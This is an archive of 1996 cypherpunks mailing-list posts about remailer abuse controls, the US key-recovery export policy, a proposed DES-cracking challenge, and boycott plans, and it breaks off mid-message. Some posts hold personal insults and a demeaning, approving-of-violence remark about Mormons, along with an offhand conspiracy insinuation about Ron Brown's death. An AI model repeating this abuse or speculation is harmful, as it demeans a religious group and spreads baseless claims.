> Any suggestions for flags besides block/allow one-way, block/allow two-way,
> and max-size?

Here are two more ideas:

1. A bit to indicate that the recipient doesn't want to receive anonymous
e-mail if it contains the strings "fuck", "piss", "shit", "cunt", etc. Of
course, this can be circumvented with "f*ck u c*nt", but it shows good faith.

2. Limit the maximum number of e-mails that one remailer can send to
this address in a 24-hour period. I'd suggest using 2 bits:

00 - unlimited
01 - 10 / day
10 - 100 / day
11 - 1000 / day

with the default being 10 / day for addresses not in the database and also
for addresses added to the preferences database w/o specifying otherwise.

Thus, if you do expect to receive more than 10 anonymous e-mails / day via
one remailer, you must add your address to the database, not necessarily
blocking anythihg, but specifing that you want 100, 1000, or an unlimited
number of messages in a day.

When the count goes over the limit, a single e-mail is sent to the recipient
saying that there may be an attempt to mailbomb him, that some of his e-mail
was being junked, and that he can change the settings if he wants to.

This should prevent the kind of abuse you've described.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chad Dougherty <chad@lycos.com>
Date: Thu, 3 Oct 1996 14:43:16 +0800
To: Scott L Patterson <spatterson@juno.com>
Subject: Re: send me mail
In-Reply-To: <19961002.072815.10350.2.spatterson@juno.com>
Message-ID: <32531EC1.6B69@lycos.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott L Patterson wrote:
> 
> Hello,
> 
>         In the happy mutant handbook it said your name on the crypto
> section so what do you do?
>         And can you send me some cool, info?
> 

We talk about everything BUT crypto here.  Don't you dare post something
related to cryptography.  What the hell is the happy mutant handbook?

-- 
Chad Dougherty
Lycos, Inc.  "The Catalog of the Internet"
http://www.lycos.com
Phone: (412)261-6660x226
Email: chad@lycos.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 3 Oct 1996 20:25:56 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
In-Reply-To: <199610030114.SAA07185@adnetsol.adnetsol.com>
Message-ID: <Pua8uD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:
>
> > Uh, in Utah, Jews are Gentiles. No lie.
>
> Yeah, I knew that.  I know plenty, and there are many pages for
> recovering Mormons.  Believe me, I've been there.  I could go on about
> my personal experiences of being on the "fast track" to church
> leadership, but that's the point.  I would rather not hear about it
> here.

Does LDS have an official position on GAK?

(We have at least one mormon asshole here, attilla, who's obviously pro-GAK)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 3 Oct 1996 19:29:28 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
In-Reply-To: <yoe2uD80w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9610022227.A8111-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 29 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Ryan Russell/SYBASE writes:
> > I guess that depends on your definition of liberty.  The Mormons
> > originally moved there to have a place to practice their religion,
> > and have freedom from persecution.  I suppose one could extend that
> > to wanting a place to have the freedom to have a set of rules consistant
> > with their beliefs.  Should that include freedom from interferance from
> > folks such as yourself who want to change their rules, even though
> > you're not presently effected?
> 
> It's worth noting that one of Utah mormons favorite pastimes was to ambush
> the settlers heading for California, kill them all, and take their property.
> However the mormons were dealt with much less severely than the local Indians
> who tried the same tricks. Pity.
> 

Ah yes, the Mountain Meadows Massacre. I was wondering when you might 
trot that little bit of revisionist history out for display. BTW, its 
your revison of history, not the way it was recorded by many other 
sources, including first hand accounts by people who had witnessed the 
whole affair and recorded it in their journals, some of which made it to 
the National Archives and was researched almost 8 years ago in order to 
raise a monument to those mem and women who were felled there courtesy of 
a miscommunication, a late communication and the US Calvary.

You might want to read a *real* historical account of what actually 
happened before sounding off and leading the rest of us to believe you 
are a graduate of the Leon Panneta Fact Reporting School of Spin Doctoring.

...Paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 3 Oct 1996 10:33:11 +0800
To: cypherpunks@toad.com
Subject: GAK Rat Pack
Message-ID: <199610022231.WAA11402@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   C|NET, October 2, 1996, 1:45 p.m. PT 
 
  
   Computer alliance supports encryption policy  
 
 
   By Alex Lash 
 
   An alliance of 11 software and hardware companies has 
   just announced its formation to develop key-recovery 
   solutions for electronic encryption, a crucial component 
   of the Clinton administration's latest plan to loosen the 
   export of encryption technology. 
 
   Announced yesterday, the administration's plan gives 
   exporters of encryption or encrypted software a two-year 
   window starting January 1, 1997, to build what the 
   administration calls "key recovery" into their products. 
   IBM, Apple Computer, Atalla, Digital Equipment, Groupe 
   Bull, Hewlett-Packard, NCR, RSA Data Security, Sun 
   Microsystems, Trusted Information Systems, and United 
   Parcel Service have banded together to develop systems 
   that will give the government what it wants, which is 
   access to suspicious encrypted messages, so that 
   compliant software companies will be able to get export 
   licenses for hard-to-crack encryption codes.  
 
   "Export controls are a fact of life," RSA President Jim 
   Bidzos said today. "In an imperfect world this technique 
   will at least allow you to take advantage of what 
   governments around the world will allow."  
 
   RSA's presence in the alliance is not only a coup for the 
   government but a big surprise, as Bidzos has been one of 
   the most vocal opponents of the Clinton administration's 
   key escrow efforts. He has even accused the government of 
   offering software companies special "sweetheart" deals to 
   gain support for its encryption regulation plans. 
 
   A key-recovery plan not only satisfies the government's 
   desire for court-ordered access to encrypted messages, 
   but also sets off alarm bells for privacy advocates and 
   civil libertarians. Some within the U.S. software 
   industry also claim they won't be able to sell encrypted 
   products overseas if customers know the U.S. government 
   has access to a skeleton key.  
 
   "While some companies might choose to cast their lot with 
   the government's key-escrow policy, the marketplace is 
   likely to reject the approved products," said David 
   Sobel, legal counsel for the Electronic Privacy 
   Information Center. "Users want strong security, not 
   guaranteed government access to their communications." 
 
   However, the concept of key recovery is not anathema to 
   companies that acknowledge that firms and folks using 
   encryption to secure electronic transactions and 
   communications will need backup copies of their keys, 
   just as homeowners keep an extra house key under a flower 
   pot. 
 
   Under the new government plan, a company that promises to 
   participate in key recovery will receive a six-month 
   license to export up to 56-bit DES encryption. When the 
   promise is fulfilled and the government can get access to 
   the decryption keys, the 56-bit limit is lifted. If by 
   the end of the two-year grace period the company has not 
   fulfilled its promise to implement a key-recovery scheme, 
   the 56-bit limit is dropped back down to the current 
   40-bit limit. 
 
   "The fact that 56-bit DES [a type of encryption] will be 
   available from significant sources is going to jump-start 
   electronic commerce," said Ken Kay, executive director of 
   the Computer Systems Policy Project, a public policy 
   group comprised of 12 computer industry CEOs.  
 
   Now that the details are out and endorsements are coming 
   in, executive action is expected in the next two to three 
   weeks, according to one senior administration official. 
   President Clinton will soon sign an executive order that 
   transfers jurisdiction over encryption export licenses 
   from the State Department to the Commerce Department, a 
   move that the computer industry has asked for in the past 
   because they see Commerce as a more sympathetic agency. 
   At the same time, Commerce will announce a new set of 
   streamlined rules to grant companies a "fast track" to an 
   export license if they comply with key recovery, the 
   official said. 
 
   Commerce plans to begin licensing on January 1. 
 
   But the new plan will also give the Justice Department a 
   voice in the licensing process, a detail that angers 
   privacy advocates and software companies alike.  
 
   "The transfer from State to Commerce has been called for 
   for a long time, but a small tweak is that the FBI now 
   has veto power," said Peter Harter, legal counsel to 
   Netscape Communications. "Domestic law enforcement 
   shouldn't have a seat at the table."  
 
   Harter acknowledged that Netscape has not ruled out key 
   recovery but said that the market must show demand for 
   it. The administration has said it hopes to introduce a 
   bill next spring that would encourage the build-up of key 
   recovery by establishing laws on the conduct of 
   third-party key holders. But it will not try to mandate 
   key recovery through legislation.  
 
   "I think we have a critical mass of companies willing to 
   work with us," said Heidi Kukis, spokesperson for the 
   Vice President's office. "That would make legislation to 
   mandate key recovery very unlikely."  
 
   Another fear is that the administration is using export 
   limits to control domestic use of encryption. While Gore 
   directly stated yesterday that domestic use of encryption 
   will remain unregulated, the double standard for domestic 
   and international products might discourage U.S. 
   companies from developing two different versions, leaving 
   U.S. and Canadian customers with the same products that 
   the federal government has deemed safe to ship overseas.  
 
   "We obtained and intend to hold the administration to its 
   assurances that export controls would not be used to 
   control domestic use," said Kay of the CSPP. "The CEOs 
   have told the administration that if they want to do 
   domestic controls, they should do it frontally through 
   the democratic process and introduce legislation."  
 
   [End] 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Thu, 3 Oct 1996 19:57:31 +0800
To: cypherpunks@toad.com
Subject: Fighting Clipper III
In-Reply-To: <3.0b24.32.19961002181037.0067e434@mail.teleport.com>
Message-ID: <v03007802ae791065bbd7@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Rich Burroughs <richieb@teleport.com> wrote:
[...]
>>>On Wed, 2 Oct 1996, John Young wrote:
>>>
>>>>    The New York Times, October 2, 1996, pp. D1, D8.
>>>>    Executives of the International Business Machines
>>>>    Corporation said late yesterday that they were still lining
>>>>    up the final list of companies in the alliance. Those
>>>>    involved will include Digital Equipment and smaller
>>>>    data-security companies including RSA Data Security, Cylink
>>>>    and Trusted Information Systems.
>>>
>>>We are in deep trouble.
>>
>>Wouldn't a letter-writing campaign be in order here?
>[snip]
>
>The word "boycott" leaped into my mind.  I personally do not believe that I
>will be buying products from any of these companies, as long as thay
>participate in this GAK charade.

Such an initiative will need publicity and letter-writing early in the
campaign will help us set the tone and points of debate on this issue.
A boycott works best when everyone knows why and there are a few key
phrases which can be used to get the message across.  Something like
"company X is helping build big brother, boycott their products" or a
few similar sound bites are needed fast.  The big brother inside stickers
from the last campaign were nice, maybe people can come up with variations
of various corporate logos or marketting phrases which help get the message
across?

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Thu, 3 Oct 1996 10:31:59 +0800
To: shamrock%netcom.com.cypherpunks@toad.com (Lucky Green) (cypherpunks mailing list)
Subject: Re: How might new GAK be enforced?
In-Reply-To: <Pine.3.89.9610011151.A4746-0100000@netcom9>
Message-ID: <3252e555.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> 
> 
> On Tue, 1 Oct 1996, Timothy C. May wrote:
> > Any other ideas on how the government plans to enforce GAK, to make GAK the
> > overwhelmingly-preferred solution?
> 
> I am not certain that the USG has to make interoperable software illegal. 
> It simply can withhold export licenses for products that allow such 
> interoperability. That might go a long way to incentivizing industry to 
> cooperate. But I would not at all be surprised if they took stronger 
> measures.
> 

If the evil Clinton administration has not made GAK illegal, it is
simply because it does not think it has the votes in congress right
now to get such legislation passed. It is probably hoping that
some outrage ( perhaps engineered ) will change this.

Thus, we have a race between those who want to get strong
unescrowed crypto so entrenched that it can not be changed and
the Clinton administration which is waiting for a change in legislative
climate.

The Clinton administration hopes to use ITAR's market pressure
to slow things down long enough for victory.

But how is ITAR to be enforced, in the absence of a new law?
As has been pointed out on this list, the inevitability of software
privacy and sub-licensing provides a loophole that would allow
US companies to evade the ITAR as a _LEGAL_ inhibition.
The big companies have smart lawyers, so why is not this loophole
being used to evade the ITAR?

The obvious answer is that extra-legal pressure can be brought to
bear on a big company. Things like threats of IRS audits and other
harassment, probably act as the big breaks. Probably such pressure
in combination with foreign governments has prevented big
foreign companies to withhold strong crypo as well.

So, if big companies are subject to governmental pressure, why
would we want their crypto? Most big companies do not release
their source-code with their crypto products. The big companies
could have been presured, ITAR or no, to put crypto holes in their
products. Big companies simply are not trustable for purposes of
crypto. Bear in mind that a sabotaged crypto product can be made
to inter-operate with a strong crypto product, by simply having
the sabotaged crypto product always choose its keys from a covertly
restricted keyspace! Thus an product made to a open strong-crypto 
standard does not address the trust problem.

Cypherpunks should not be asking big companies to write crypto
products, but rather should be asking for crypto-with-a-hole.
This would allow us to check the software for cracks and PGP
or something like it could become the world crypto standard.

Perhaps if the hole were made general enough, it could also
be used to evade the ITAR. A software product could support
generalized filtering with other uses besides crypto. After all,
they have not embargoed C compilers and compilers can be 
used to implement crypto. (I do not know, I am not a lawyer.)

Any how, conclusion is that cypherpunks should not be asking
big companies to implement crypto, but rather look for easy ways
users can implement crypto "on top of" commercial software products.
Therefore we should boycott and disparage any commercial products
that voluntarily implement GAK.

-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 3 Oct 1996 20:10:01 +0800
To: cypherpunks@toad.com
Subject: Conspiracy Stuff: Ron Brown's death and Crypto ...
Message-ID: <199610030600.XAA20074@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Too much fun for the conspiracy buffs ...

Did Ron Brown's plane really fly off course due to pilot error?

No, don't even bother replying to me on this matter.  I'm just
up too late, and I tossing this one out there on a whim ...

Ern

-------- INCLUDED ARTICLE (From: New York Times "CyberTimes"):

Commerce Department Urges
Easing of Encryption Controls

By Bloomberg Business News

WASHINGTON - The Commerce Department will recommend easing export
controls on encryption software after a study by the department and
the National Security Agency found that American companies are being
hurt, Commerce Secretary Ronald H. Brown said last week.

Such a move may pit Mr. Brown against the military and intelligence
agencies, setting the stage for a White House battle over one of the
last computer technologies still covered by export controls.

"I'm interested in promoting American exports," Mr. Brown said in an
interview on Friday. "If your foreign competitors are exporting
products with encryption capability and you are not, that puts you at
a tremendous competitive disadvantage."

The Government bans United States companies from exporting encryption
software - hard-to-break computer codes that turn information, like
files and credit card numbers, into indecipherable material that can
be sent across computer networks without fear of tampering.

The United States justifies the export restrictions by saying
law-enforcement agencies would be hamstrung in their efforts to stop
terrorists or spies from using encryption to send information
worldwide.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:33:29 +0800
To: "shamrock@netcom.com>
Subject: Re: Export laws don't just affect crypto
Message-ID: <19961004020539265.AAA223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 00:05:16 -0700 (PDT), Lucky Green wrote:

>The recent posts about GPS made me research the state of the art of GPS 
>receivers. Seems they are getting pretty good. Two pounds, sub-meter 
>accuracy, attitude determination, all at altitudes up to 60,000 feet and 
>speeds up to 1,000 nmph. But what really caught my eye was the fine print 
>at the bottom of the spec sheet:
>
>"Higher altitude and velocities up to 25,000 nautical miles-per-hour 
>options are available in the U.S."
>
>I gather from this that as long as you are in the US, you are welcome to 
>use this technology for applications that require larger than 1,000 nmph 
>speeds.
>
>Seems the software industry is not the only industry that's suffering 
>from silly export control laws.


Possibly  - certainly there are plenty of legislators who'd do it.   I'd
heard, however, that the precision of your signal could be increased by
getting a fix on more than 3 satellites at a time - and that the GPS network
had been designed to 'blanket' the Northern Hemisphere.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 22:40:32 +0800
To: "trei@process.com>
Subject: Re: Can we kill single DES?
Message-ID: <19961004020539265.AAB223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 16:27:18 -6, Peter Trei wrote:

>1. Is this a good idea? What will happen if DES becomes perceived
>    as insecure?

That's Declan's department (and other non-clueless journalists - declan is
just the most visible).   If it get's widespread and the target is something
like Digicash, it'd get picked up by the Crime/Snoozeweek crowd.

>2. What is the probability of success required to make it worth doing?

Judging by the people on the list, about 50%.... <g>

>3. What would be the consequences of failure?

Depends on the type of failure - ranging from dreadful to minor.

>4. What other platforms than NT/Win95/Pentium should be considered?
>   I could write a Unix demon version, but unless it's tailored for the 
>   cpu, a lot of efficency is lost
>   (The aggregate number of idle cycles available for testing is the 
>  crucial number).

A Linux port (Pentium) would be *very* good - lots of Linux people tend to by
pro-cpunk.  Ditto for OS/2.   And who knows, if you hyped the business
aspects enough you might even find IBM or some other large corp willing to
donate some time on large system.

>5. What's a good target? Ideally, we need a plaintext/ciphertext pair,

ecash, ecash, ecash!    Given all the attention anything that 'will give your
VISA number to evil hackers' gets, this is an important target.  It's serious
and newsworthy.

>6. What other incentives can be used to recruit machines?

Maybe give away a Pentium to the person who finds it? (Assuming donations
from list members, of course)

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 3 Oct 1996 18:58:30 +0800
To: cypherpunks@toad.com
Subject: KOTM [Important]
Message-ID: <199610030628.XAA29683@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


The Kook of the Month wrote:

>
>Dave Temple <dtemple@ashland.edu> writes:
>> 	I joined this list knowing next to nothing about cryptography.  I
>
>You're not alone. Timmy May (fart) and many other spammers on this list
>still know next to nothing about cryptography, despite posting dozens of
>inane rants every day.

Vulis, you are an asshole.
me









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Thu, 3 Oct 1996 18:30:59 +0800
To: cypherpunks@toad.com
Subject: Re: Thoughtcrime a Reality: U.S. Toughens Child Pornography Law
Message-ID: <199610030332.XAA16644@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996, Joseph M. Reagle Jr. wrote:

> >	 WASHINGTON (Reuter) - Congress cracked down on child  
> >pornographers in a new law that took effect Tuesday, making it 
> >illegal to appear to depict children in sexual situations, 
> >whether in films, computer images or photographs. 

``True Crime'' among many others








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:03:52 +0800
To: "tcmay@got.net>
Subject: Re: ADJ_ust
Message-ID: <19961004020539265.AAD223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 10:26:12 -0800, Timothy C. May wrote:

>Personally, I think there's a lot of hype about this whole "infowar" thing.
>Sure, security measures and vulnerabilities always need to be looked at,
>but a lot of the rhetoric is being driven by journalists looking for lead
>stories.

This is certainly the case with 99% of the computer industry press!

I certainly have no problem believing that a group of well-supplied
professionals could, with enough time and [political] support, take down a
single target.   For instance, if the CIA,FBI and NSA wanted to hose the 1st
Bank of China, I have a feeling that they would - eventually.   I have strong
doubts that someone would come up with a non-nuke that could destroy stuff
indiscriminately within a useably large area.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Thu, 3 Oct 1996 19:05:50 +0800
To: vax@linkdead.paranoia.com (VaX#n8)
Subject: Re: encrypting pppd?
In-Reply-To: <199610021431.JAA02934@linkdead.paranoia.com>
Message-ID: <961002.235706.1R8.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, vax@linkdead.paranoia.com writes:

> Anyone worked on, or know of a freely available, one of these beasts?

What threat model does this address?  It'd be link encryption, where the
best security is found in end-to-end encryption.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlNH/xvikii9febJAQHpGwP+Kas52dEW1v7+rGNvpsOEhHhPFT03l41k
EMhqHd9ULlSS5glNMoadPkhX6uAg7I0TEZSl1uNt3wdNp1EMQg63k3Qlxmu9OT0Q
RBKLXE+PIknWP9MXF73EI8RtEeqI+OsOfzXVNthXThlc+fKAtRc3eaBb0W6w/bpK
xV0PoUEBm74=
=T2Gb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Thu, 3 Oct 1996 18:31:56 +0800
To: cypherpunks@toad.com
Subject: Re: "Confessing to a felony"
In-Reply-To: <v03007803ae785c7c1dfc@[207.67.246.99]>
Message-ID: <961003.000007.1g6.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, Black Unicorn wrote:

>I challenge you to find an airport today that will not hand inspect
>laptops in checked bagage and either x-ray or hand inspect or both laptops
>carried on.

MSP (Minneapolis/St. Paul) security personnel have let my work laptop
through security 3 times in the last couple of months.  In the past
year, I have carried it through Kansas City, Atlanta, Louisville,
Dallas/Ft. Worth and San Antonio without anything more than an x-ray
screening (which would only turn up a non-laptop, anyway).  On the
occasions I've seen somebody else getting the "boot scan", it's never
gone past the BIOS screen.  Airport security personnel, as a class, are
completely ignorant about computers.  I've gotten more flack for a knife
in my belt buckle. (a lot more, actually, but that's another story...)
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlNKpxvikii9febJAQEjEwQAjh5v92rtJAGZtWDjifSGZ56ig65Nydir
momhzBCmh0f+pADJdEmG39H8fl856ePA6gpnqZBnnlA4ariPy0ecrSst7rSUjI0E
+rSiJtfmmJmo9zLWubbil/6vPAzPX6Z4V0tsT2FT3WONvCjkcSnQcfaOmcx+20is
yNBSBLZvwu0=
=AuKR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 22:49:37 +0800
To: "trei@process.com>
Subject: Re: Can we kill single DES?
Message-ID: <19961004020539265.AAE223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 01 Oct 1996 19:01:08 -0800, jim bell wrote:

>Maybe Microsoft would be willing to help?  After all, it is THEY who are 
>going to be limited to DES-strength exports if things continue as they've 
>been going.  How about Intel?

Netscape would be a great choice as well - the Internet security market is
*very* important.  Microsoft has publically said that their cash flow model
will work if they make NOTHING off of internet software of any sort.  Compare
this with the fortunes being spent on "Netscape Enterprise Server" or the
like.   They could issue press releases talking about how they have the
software to keep your VISA secure but the USG isn't allowing them to use it!

Microsoft would probably do anything the USG asked if, say, immunity from the
DOJ was granted under the table.

NTT is also a great choice, as you mentioned above.

IBM, Sun, DG, Cray (a Silicon Graphics subsidiary?), etc. might go for some
free publicity - I've seen a LOT of press releases out of IBM that talk about
"blue-sky" research being done.   Given that IBM lives because of big
business, they also have a demonstratable interest.   I'm sure they'd love to
be able to advertise that the data you trust to DB2 (for instance) is
entirely secure.   The same argument works for DG.  Also, IBM has a lot
invested in chip fabrication facilities - there's got to be some extra
capacity there! Sun has always seemed to be big on tech-demo type things. 
Cray - well that's obvious.  The supercomputer market is heading toward
massive parallelism.  Leaching time looks interesting!



#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:12:45 +0800
To: "tcmay@got.net>
Subject: Re: Clipper III on the table
Message-ID: <19961004020539265.AAF223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 19:34:23 -0800, Timothy C. May wrote:

>As for IBM's involvement, they've played around with the NSA for decades.
>Nothing new there. Fortunately, today they're just a marginal player.

This is a very dangerous statement to make.  IBM is nowhere near as powerful
as they were, but they're still very solidly entrenched in the business
world*.   Money is what will ultimately decide this issue - if  Bill
Clinton's VISA was abused after a hacker sniffed a network transaction ITAR
would be dead within seconds!


* - people have said that OS/2 is dead.  Well it turns out that IBM is making
several *BILLION* in sales every year on it from their business deals. 
According to figures I've seen, they have a high percentage of the F500
market.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:07:39 +0800
To: "nobody@cypherpunks.ca>
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <19961004020539265.AAG223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 20:50:17 -0700, John Anonymous MacDonald wrote:

>> "What?" I asked. "Unless you're talking about import restrictions."
>> 
>> "Exactly," he said.
>> 
>> -Declan
>
>I don't doubt that they can do this if they really want to, but I
>wonder what legal basis they will use for import restrictions.
>
>Are there any current import restrictions for products on can legally
>manufacture, sell, and use in the United States?
>
>Thanks.

They could easily levy a $1*10^99 tariff per byte. That might have the same
effect... <g>

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:35:31 +0800
To: "tcmay@got.net>
Subject: Re: How might new GAK be enforced?
Message-ID: <19961004020539265.AAH223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996 20:55:40 -0800, Timothy C. May wrote:

>And just what would you call PGP?

>Long before the MIT deal, people in the U.S. were using their "OK in
>America" (not counting RSADSI's issues) software to communicate with
>"illegally exported" copies in foreign lands.

Just informally, how many of the people on this list do you think have
bypassed any cooperation with the USG on general principles and are using
International PGP?   ("Well this one uses non-banned math")


Unfortunately, we've already demonstrated that hackers (real ones) and/or
cpunks will use Underground Crypto.  What's missing is evidence that business
(and thus Joe Sixpack - either directly or indirectly) will.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:27:11 +0800
To: "Declan McCullagh" <joeshea@netcom.com>
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <19961004020539265.AAI223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996 10:27:46 -0700 (PDT), Joe Shea wrote:


>	You just managed to justify your own censorship of the list, 
>Declan.  Talk about clueless!

How'd that old line go about cooking implements and carbon deposits?  

As has often been enumerated on the list:
	If someone wishes to say something - anything - to a group of like-minded
people, that is his choice.  If they choose not to listen, that is their
choice.   If declan chooses not to forward mail to a list he moderates, it's
his choice.  He doesn't force anyone to read that list.  He certainly doesn't
force them to avoid any other lists. If they don't like his list or disagree
with his views they can show their disapproval by going elsewhere (seealso:
Free Market)


Consider your argument in a different light:  Do you complain that Rush
Limbaugh never lets the head of N.O.W. or Bill Clinton do a show?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 20:58:01 +0800
To: "Greg Broiles" <jimbell@pacifier.com>
Subject: Re: ITAR satellite provision
Message-ID: <19961004020539265.AAJ223@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 02 Oct 1996 09:28:22 -0800, jim bell wrote:

>>     "Export means, for purposes of this subchapter:
>[snip]
>>*   A launch vehicle or payload shall not, by reason of the launching
